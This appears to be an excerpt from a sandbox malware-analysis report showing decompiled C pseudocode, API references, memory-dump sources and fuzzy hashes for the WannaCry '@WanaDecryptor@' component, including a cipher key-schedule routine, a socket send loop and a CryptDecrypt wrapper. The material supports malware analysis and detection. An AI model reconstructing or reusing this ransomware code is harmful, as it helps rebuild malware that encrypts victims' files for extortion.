                                  					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
                                  					_t238 = _t399 + 0xc;
                                  					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                  					_push(0x41c9c0);
                                  					_push(_t399 + 8);
                                  					L004130FC();
                                  				}
                                  				 *(_t236 + 0x3c8) = _t170;
                                  				 *(_t236 + 0x3cc) = _t238;
                                  				_t290 = _t238;
                                  				_t385 =  *(_t399 + 0x20);
                                  				_t19 = _t236 + 0x3d0; // 0x424
                                  				_t239 = _t238 >> 2;
                                  				memcpy(_t19, _t385, _t239 << 2);
                                  				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
                                  				_t22 = _t236 + 0x3f0; // 0x444
                                  				_t245 =  *(_t236 + 0x3cc) >> 2;
                                  				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
                                  				_t403 = _t399 + 0x30;
                                  				_t177 =  *(_t236 + 0x3c8);
                                  				if(_t177 == 0x10) {
                                  					_t178 =  *(_t236 + 0x3cc);
                                  					if(_t178 != 0x10) {
                                  						asm("sbb eax, eax");
                                  						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
                                  					} else {
                                  						_t182 = 0xa;
                                  					}
                                  					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
                                  				} else {
                                  					if(_t177 == 0x18) {
                                  						asm("sbb ecx, ecx");
                                  						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
                                  					} else {
                                  						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
                                  					}
                                  				}
                                  				asm("cdq");
                                  				_t292 = 0;
                                  				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
                                  				 *(_t403 + 0x2c) = _t251;
                                  				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
                                  					L23:
                                  					_t293 = 0;
                                  					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
                                  						L28:
                                  						_t44 = _t236 + 0x414; // 0x468
                                  						_t387 = _t44;
                                  						asm("cdq");
                                  						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
                                  						 *(_t403 + 0x30) = _t353;
                                  						_t189 =  *(_t403 + 0x24);
                                  						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
                                  						 *(_t403 + 0x10) = _t395;
                                  						if(_t395 <= 0) {
                                  							L31:
                                  							_t388 = 0;
                                  							if(_t395 <= 0) {
                                  								L35:
                                  								if(_t388 >= _t353) {
                                  									L51:
                                  									_t190 = 1;
                                  									 *(_t403 + 0x30) = 1;
                                  									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
                                  										L58:
                                  										 *((char*)(_t236 + 4)) = 1;
                                  										return _t190;
                                  									}
                                  									_t151 = _t236 + 0x208; // 0x25c
                                  									_t397 = _t151;
                                  									do {
                                  										if(_t251 <= 0) {
                                  											goto L57;
                                  										}
                                  										_t390 = _t397;
                                  										_t355 = _t251;
                                  										do {
                                  											_t192 =  *_t390;
                                  											 *(_t403 + 0x24) = _t192;
                                  											_t390 =  &(_t390[1]);
                                  											_t355 = _t355 - 1;
                                  											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
                                  										} while (_t355 != 0);
                                  										_t251 =  *(_t403 + 0x2c);
                                  										L57:
                                  										_t190 =  *(_t403 + 0x30) + 1;
                                  										_t397 =  &(_t397[8]);
                                  										 *(_t403 + 0x30) = _t190;
                                  									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
                                  									goto L58;
                                  								}
                                  								 *(_t403 + 0x28) = 0x41a1b0;
                                  								do {
                                  									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
                                  									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
                                  									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
                                  									if(_t395 == 8) {
                                  										_t104 = _t236 + 0x418; // 0x46c
                                  										_t198 = _t104;
                                  										_t268 = 3;
                                  										do {
                                  											 *_t198 =  *_t198 ^  *(_t198 - 4);
                                  											_t198 =  &(_t198[1]);
                                  											_t268 = _t268 - 1;
                                  										} while (_t268 != 0);
                                  										 *(_t403 + 0x24) =  *(_t236 + 0x420);
                                  										_t275 = 3;
                                  										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
                                  										_t116 = _t236 + 0x428; // 0x47c
                                  										_t203 = _t116;
                                  										do {
                                  											 *_t203 =  *_t203 ^  *(_t203 - 4);
                                  											_t203 =  &(_t203[1]);
                                  											_t275 = _t275 - 1;
                                  										} while (_t275 != 0);
                                  										L46:
                                  										 *(_t403 + 0x24) = 0;
                                  										if(_t395 <= 0) {
                                  											goto L50;
                                  										}
                                  										_t119 = _t236 + 0x414; // 0x468
                                  										_t375 = _t119;
                                  										while(1) {
                                  											_t251 =  *(_t403 + 0x2c);
                                  											if(_t388 >=  *(_t403 + 0x30)) {
                                  												goto L51;
                                  											}
                                  											_t398 =  *_t375;
                                  											asm("cdq");
                                  											_t375 = _t375 + 4;
                                  											_t276 = _t388 / _t251;
                                  											asm("cdq");
                                  											_t317 = _t388 %  *(_t403 + 0x2c);
                                  											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
                                  											_t395 =  *(_t403 + 0x10);
                                  											_t214 =  *(_t403 + 0x24) + 1;
                                  											_t388 = _t388 + 1;
                                  											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
                                  											 *(_t403 + 0x24) = _t214;
                                  											if(_t214 < _t395) {
                                  												continue;
                                  											}
                                  											goto L50;
                                  										}
                                  										goto L51;
                                  									}
                                  									if(_t395 <= 1) {
                                  										goto L46;
                                  									}
                                  									_t101 = _t236 + 0x418; // 0x46c
                                  									_t215 = _t101;
                                  									_t278 = _t395 - 1;
                                  									do {
                                  										 *_t215 =  *_t215 ^  *(_t215 - 4);
                                  										_t215 =  &(_t215[1]);
                                  										_t278 = _t278 - 1;
                                  									} while (_t278 != 0);
                                  									goto L46;
                                  									L50:
                                  									_t251 =  *(_t403 + 0x2c);
                                  								} while (_t388 <  *(_t403 + 0x30));
                                  								goto L51;
                                  							}
                                  							_t58 = _t236 + 0x414; // 0x468
                                  							 *(_t403 + 0x24) = _t58;
                                  							while(_t388 < _t353) {
                                  								asm("cdq");
                                  								_t378 = _t388 / _t251;
                                  								asm("cdq");
                                  								_t321 = _t388 % _t251;
                                  								 *(_t403 + 0x28) = _t321;
                                  								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
                                  								_t388 = _t388 + 1;
                                  								_t224 =  *(_t403 + 0x24);
                                  								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
                                  								_t353 =  *(_t403 + 0x30);
                                  								 *(_t403 + 0x24) = _t224 + 4;
                                  								if(_t388 < _t395) {
                                  									continue;
                                  								}
                                  								goto L35;
                                  							}
                                  							goto L51;
                                  						}
                                  						 *(_t403 + 0x24) = _t395;
                                  						do {
                                  							_t387 = _t387 + 4;
                                  							 *(_t387 - 4) = 0 << 0x18;
                                  							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
                                  							_t189 = _t189 + 4;
                                  							_t337 =  *(_t403 + 0x24) - 1;
                                  							 *(_t403 + 0x24) = _t337;
                                  						} while (_t337 != 0);
                                  						goto L31;
                                  					}
                                  					_t38 = _t236 + 0x1e8; // 0x23c
                                  					_t391 = _t38;
                                  					do {
                                  						if(_t251 > 0) {
                                  							memset(_t391, 0, _t251 << 2);
                                  							_t403 = _t403 + 0xc;
                                  							_t251 =  *(_t403 + 0x2c);
                                  						}
                                  						_t293 = _t293 + 1;
                                  						_t391 = _t391 + 0x20;
                                  					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
                                  					goto L28;
                                  				} else {
                                  					_t33 = _t236 + 8; // 0x5c
                                  					_t392 = _t33;
                                  					do {
                                  						if(_t251 > 0) {
                                  							memset(_t392, 0, _t251 << 2);
                                  							_t403 = _t403 + 0xc;
                                  							_t251 =  *(_t403 + 0x2c);
                                  						}
                                  						_t292 = _t292 + 1;
                                  						_t392 = _t392 + 0x20;
                                  					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
                                  					goto L23;
                                  				}
                                  			}















































                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                  • Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
                                  • Opcode Fuzzy Hash: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                  • Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
                                  				void _v1024;
                                  				char _v1028;
                                  				intOrPtr _v1032;
                                  				intOrPtr _v1036;
                                  				void* _v1040;
                                  				intOrPtr _v1044;
                                  				char _v1048;
                                  				signed int _t34;
                                  				void* _t36;
                                  				intOrPtr _t37;
                                  				void* _t43;
                                  				void* _t45;
                                  				intOrPtr _t46;
                                  				void* _t49;
                                  				signed int _t58;
                                  				intOrPtr* _t60;
                                  				signed int _t70;
                                  				signed int _t71;
                                  				signed int _t78;
                                  				void* _t83;
                                  				void* _t91;
                                  				void* _t102;
                                  				void* _t103;
                                  				void* _t104;
                                  				void* _t105;
                                  				void** _t107;
                                  				void** _t109;
                                  
                                  				_t106 =  &_v1040;
                                  				_t105 = _a8;
                                  				_t60 = __ecx;
                                  				_v1032 = 0;
                                  				if(_t105 != 0) {
                                  					_t34 = E0040D5D0(__ecx);
                                  					__eflags = _t34;
                                  					if(_t34 != 0) {
                                  						__eflags = _a12;
                                  						if(_a12 == 0) {
                                  							_t36 = _a4;
                                  							_v1040 = _t36;
                                  							_t91 = _t36;
                                  							goto L13;
                                  						} else {
                                  							__eflags = _a16;
                                  							if(_a16 != 0) {
                                  								__eflags = _t105 - 0x400;
                                  								if(_t105 > 0x400) {
                                  									_t49 = E00412A90(_t105);
                                  									_t109 =  &(( &_v1040)[1]);
                                  									_v1040 = _t49;
                                  									__eflags = _t49;
                                  									if(_t49 != 0) {
                                  										_t103 = _a4;
                                  										_t70 = _t105;
                                  										_t71 = _t70 >> 2;
                                  										memcpy(_t49, _t103, _t71 << 2);
                                  										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
                                  										_t106 =  &(_t109[6]);
                                  										_t91 = _v1040;
                                  										E0040D2B0(_t60, _t91, _t105);
                                  										goto L13;
                                  									} else {
                                  										return _t49;
                                  									}
                                  								} else {
                                  									_t104 = _a4;
                                  									_t78 = _t105 >> 2;
                                  									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
                                  									_t106 =  &(( &_v1040)[6]);
                                  									_t83 =  &_v1024;
                                  									_t91 = _t83;
                                  									_v1040 = _t83;
                                  									E0040D2B0(_t60, _t91, _t105);
                                  									goto L13;
                                  								}
                                  							} else {
                                  								_t91 = _a4;
                                  								E0040D2B0(__ecx, _t91, _t105);
                                  								L13:
                                  								_push( &_v1028);
                                  								L0041303E();
                                  								_t37 = _v1028;
                                  								_t107 =  &(_t106[1]);
                                  								_t102 = 0;
                                  								_v1036 = _t37;
                                  								__eflags = _t105;
                                  								if(_t105 > 0) {
                                  									while(1) {
                                  										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
                                  										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
                                  											goto L25;
                                  										}
                                  										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
                                  										__eflags = _t43;
                                  										if(__eflags > 0) {
                                  											_t102 = _t102 + _t43;
                                  											__eflags = _t102;
                                  											_push( &_v1048);
                                  											goto L24;
                                  										} else {
                                  											if(__eflags != 0) {
                                  												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
                                  												__eflags = _t45 - 0x2733;
                                  												if(_t45 == 0x2733) {
                                  													_t46 = _v1044;
                                  													__eflags = _t46 - 0x64;
                                  													_v1044 = _t46 + 1;
                                  													if(_t46 > 0x64) {
                                  														Sleep(0x64);
                                  														_v1044 = 0;
                                  													}
                                  													_push( &_v1048);
                                  													L24:
                                  													L0041303E();
                                  													_t107 =  &(_t107[1]);
                                  													__eflags = _t102 - _t105;
                                  													if(_t102 < _t105) {
                                  														_t37 = _v1048;
                                  														continue;
                                  													}
                                  												}
                                  											}
                                  										}
                                  										goto L25;
                                  									}
                                  								}
                                  								L25:
                                  								__eflags = _t91 - _a4;
                                  								if(_t91 != _a4) {
                                  									__eflags = _t91 -  &_v1024;
                                  									if(_t91 !=  &_v1024) {
                                  										__eflags = _t91;
                                  										if(_t91 != 0) {
                                  											free(_t91);
                                  										}
                                  									}
                                  								}
                                  								return _t102;
                                  							}
                                  						}
                                  					} else {
                                  						_t58 = _t34 | 0xffffffff;
                                  						__eflags = _t58;
                                  						return _t58;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}

                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                  • Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
                                  • Opcode Fuzzy Hash: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                  • Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E00404AF0(void* __ecx, void* _a4, int _a8) {
                                  				intOrPtr* _v4;
                                  				void* _v8;
                                  				signed int _v12;
                                  				int _t12;
                                  				void* _t19;
                                  				signed int _t22;
                                  				signed int _t23;
                                  				struct _CRITICAL_SECTION* _t30;
                                  				void* _t36;
                                  
                                  				_t19 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 8)) != 0) {
                                  					_t2 = _t19 + 0x10; // 0x14
                                  					_t30 = _t2;
                                  					EnterCriticalSection(_t30);
                                  					_t36 = _a4;
                                  					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
                                  					_push(_t30);
                                  					if(_t12 != 0) {
                                  						LeaveCriticalSection();
                                  						_t22 = _v12;
                                  						_t23 = _t22 >> 2;
                                  						memcpy(_v8, _t36, _t23 << 2);
                                  						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
                                  						return 1;
                                  					} else {
                                  						LeaveCriticalSection();
                                  						return 0;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
                                  • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
                                  • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$CryptDecryptEnterLeave
                                  • String ID:
                                  • API String ID: 1395129968-0
                                  • Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                  • Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
                                  • Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                  • Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 271 4090f0-40911e 272 409124-40915c #540 #3874 271->272 273 40971e-409736 271->273 274 409185-40918c 272->274 275 40915e-409163 272->275 276 40919c-4091c4 _ftol 274->276 277 40918e-409197 #860 274->277 278 409165-40916c 275->278 279 4091c8-4091cf 275->279 276->279 277->276 282 40917c-409183 278->282 283 40916e-409177 #860 278->283 280 4091d5-409327 SendMessageA #2860 call 409df0 call 409870 #5875 #6170 GetWindowOrgEx #540 #2818 279->280 281 40970a-409719 #800 279->281 289 409329-409357 GetObjectA 280->289 290 40935b-409389 GetTextExtentPoint32A 280->290 281->273 282->279 283->282 289->290 291 4093a1-4093a4 290->291 292 40938b-40939f 290->292 294 4093a6-4093b6 291->294 295 4093b8-4093bd 291->295 293 4093f6-40940b GetViewportOrgEx 292->293 299 409411-409430 call 409d40 293->299 300 4094a9-4094f3 293->300 296 4093f2 294->296 297 4093d9-4093de 295->297 298 4093bf-4093d7 295->298 296->293 297->293 301 4093e0-4093f0 297->301 298->293 307 409432 299->307 308 409436-409444 299->308 305 4094f5-409512 300->305 306 409517-409525 300->306 301->296 311 40961a-409658 #800 305->311 309 409527-409535 306->309 310 40953d-409553 306->310 307->308 308->311 312 40944a-4094a4 308->312 309->310 314 4095b3-4095bf 310->314 315 409555-409568 310->315 319 409662-40967b 311->319 320 40965a-40965d #6170 311->320 322 409610-409612 312->322 314->311 318 4095c1-4095d1 314->318 326 40956a 315->326 327 40956e-4095ab 315->327 328 4095d3 318->328 329 4095d7-40960c 318->329 324 409685-40969c 319->324 325 40967d-409680 #5875 319->325 320->319 322->311 330 4096a6-4096bc 324->330 331 40969e-4096a1 324->331 325->324 326->327 327->314 328->329 329->322 332 4096c8-409702 #2414 * 2 330->332 333 4096be-4096c3 330->333 331->330 332->281 333->332
                                  C-Code - Quality: 86%
                                  			E004090F0(intOrPtr* __ecx, void* __fp0) {
                                  				signed int _t226;
                                  				signed int _t230;
                                  				struct tagPOINT _t232;
                                  				long _t233;
                                  				signed int _t237;
                                  				signed int _t242;
                                  				intOrPtr _t246;
                                  				intOrPtr* _t264;
                                  				signed int _t269;
                                  				signed int _t270;
                                  				signed int _t271;
                                  				signed int _t272;
                                  				signed int _t276;
                                  				intOrPtr _t279;
                                  				signed int _t282;
                                  				intOrPtr* _t283;
                                  				struct tagPOINT _t295;
                                  				signed int _t311;
                                  				signed int _t314;
                                  				signed int** _t321;
                                  				intOrPtr _t361;
                                  				intOrPtr _t418;
                                  				intOrPtr* _t429;
                                  				signed int* _t433;
                                  				long _t437;
                                  				signed int _t438;
                                  				intOrPtr* _t440;
                                  				signed int _t441;
                                  				intOrPtr _t442;
                                  				void* _t443;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041414D);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t442;
                                  				_t443 = _t442 - 0xc4;
                                  				_t321 =  *(_t443 + 0xd8);
                                  				_t226 = _t321[1];
                                  				_t429 = __ecx;
                                  				if((_t226 & 0x00000003) == 0) {
                                  					L49:
                                  					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
                                  					return _t226;
                                  				}
                                  				_t433 =  *_t321;
                                  				 *(_t443 + 0x40) = _t226 & 0x00000004;
                                  				 *(_t443 + 0x10) = 0;
                                  				L00412DA6();
                                  				_push(_t443 + 0x14);
                                  				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
                                  				L00412DD6();
                                  				_t230 = _t321[1] & 0x00000300;
                                  				if(_t230 == 0x100) {
                                  					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
                                  						_push("%d%%");
                                  						L00412DA0();
                                  					}
                                  					_t232 = _t321[7];
                                  					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
                                  					asm("fild dword [esp+0x28]");
                                  					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
                                  					asm("fidiv dword [esp+0x28]");
                                  					L0041304A();
                                  					 *(_t443 + 0x10) = _t232;
                                  				} else {
                                  					if(_t230 == 0x200) {
                                  						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
                                  							_push("%d");
                                  							L00412DA0();
                                  						}
                                  						 *(_t443 + 0x10) = _t321[6];
                                  					}
                                  				}
                                  				_t226 =  *(_t443 + 0x14);
                                  				if( *((intOrPtr*)(_t226 - 8)) == 0) {
                                  					L48:
                                  					 *(_t443 + 0xdc) = 0xffffffff;
                                  					L00412CC2();
                                  					goto L49;
                                  				} else {
                                  					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
                                  					L00412DE2();
                                  					_t437 = _t233;
                                  					 *(_t443 + 0x54) = _t433;
                                  					 *(_t443 + 0x50) = 0x416794;
                                  					 *(_t443 + 0xdc) = 1;
                                  					E00409DF0(_t443 + 0x58);
                                  					 *(_t443 + 0x58) = 0x416780;
                                  					 *((char*)(_t443 + 0xe0)) = 2;
                                  					 *(_t443 + 0x64) = 0;
                                  					 *(_t443 + 0x54) = 0x41677c;
                                  					E00409870(_t443 + 0x54, _t437);
                                  					 *(_t443 + 0x68) = _t433;
                                  					 *((char*)(_t443 + 0xe0)) = 4;
                                  					 *(_t443 + 0x70) = 0xffffffff;
                                  					 *(_t443 + 0x68) = 0x416778;
                                  					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
                                  					 *(_t443 + 0x90) = _t237;
                                  					 *(_t443 + 0x6c) = _t237;
                                  					 *(_t443 + 0x88) = _t433;
                                  					_push(1);
                                  					 *((char*)(_t443 + 0xe0)) = 6;
                                  					 *(_t443 + 0x90) = 0;
                                  					 *(_t443 + 0x88) = 0x416774;
                                  					L00412DC4();
                                  					 *(_t443 + 0x70) = _t237;
                                  					 *(_t443 + 0x8c) = _t237;
                                  					 *(_t443 + 0x7c) = _t433;
                                  					_push(0xe);
                                  					 *((char*)(_t443 + 0xe0)) = 8;
                                  					 *(_t443 + 0x84) = 0xffffffff;
                                  					 *(_t443 + 0x7c) = 0x416770;
                                  					L00413004();
                                  					 *(_t443 + 0x74) = _t237;
                                  					 *(_t443 + 0x80) = _t237;
                                  					 *((char*)(_t443 + 0xe4)) = 9;
                                  					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
                                  					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
                                  					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
                                  					L00412DA6();
                                  					_push( *(_t443 + 0x10));
                                  					_push( *(_t443 + 0x14));
                                  					_push(_t443 + 0x1c);
                                  					 *((char*)(_t443 + 0xe8)) = 0xa;
                                  					L00412E00();
                                  					_t443 = _t443 + 0xc;
                                  					_t242 = 0;
                                  					 *((intOrPtr*)(_t443 + 0x28)) = 0;
                                  					if(_t437 != 0) {
                                  						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
                                  						_t242 = 0;
                                  						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
                                  					}
                                  					 *(_t443 + 0x10) = _t242;
                                  					 *(_t443 + 0x2c) = _t242;
                                  					 *(_t443 + 0x24) = _t242;
                                  					_t438 = 0;
                                  					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
                                  					_t246 =  *((intOrPtr*)(_t443 + 0x28));
                                  					if(_t246 != 0) {
                                  						if(_t246 != 0x5a) {
                                  							if(_t246 != 0xb4) {
                                  								if(_t246 != 0x10e) {
                                  									goto L21;
                                  								}
                                  								_t441 =  *(_t443 + 0x20);
                                  								 *(_t443 + 0x10) = _t441;
                                  								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
                                  								_t438 =  ~_t441;
                                  								L20:
                                  								 *(_t443 + 0x24) = 0;
                                  								goto L21;
                                  							}
                                  							_t311 =  *(_t443 + 0x20);
                                  							 *(_t443 + 0x2c) = _t311;
                                  							_t438 = 0;
                                  							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
                                  							 *(_t443 + 0x24) =  ~_t311;
                                  							goto L21;
                                  						}
                                  						_t438 =  *(_t443 + 0x20);
                                  						 *(_t443 + 0x10) = _t438;
                                  						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
                                  						goto L20;
                                  					} else {
                                  						_t314 =  *(_t443 + 0x20);
                                  						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
                                  						 *(_t443 + 0x2c) = _t314;
                                  						 *(_t443 + 0x24) = _t314;
                                  						L21:
                                  						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
                                  						if((_t321[1] & 0x00000010) == 0) {
                                  							asm("cdq");
                                  							 *(_t443 + 0x44) =  *_t433;
                                  							asm("cdq");
                                  							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
                                  							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
                                  								_t264 =  *((intOrPtr*)(_t443 + 0xec));
                                  								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
                                  									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
                                  								}
                                  								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
                                  								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
                                  									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
                                  									if( *(_t443 + 0x90) == 0xffffffff) {
                                  										 *(_t443 + 0x6c) = _t282;
                                  									}
                                  									_t283 = _t440;
                                  									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
                                  									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
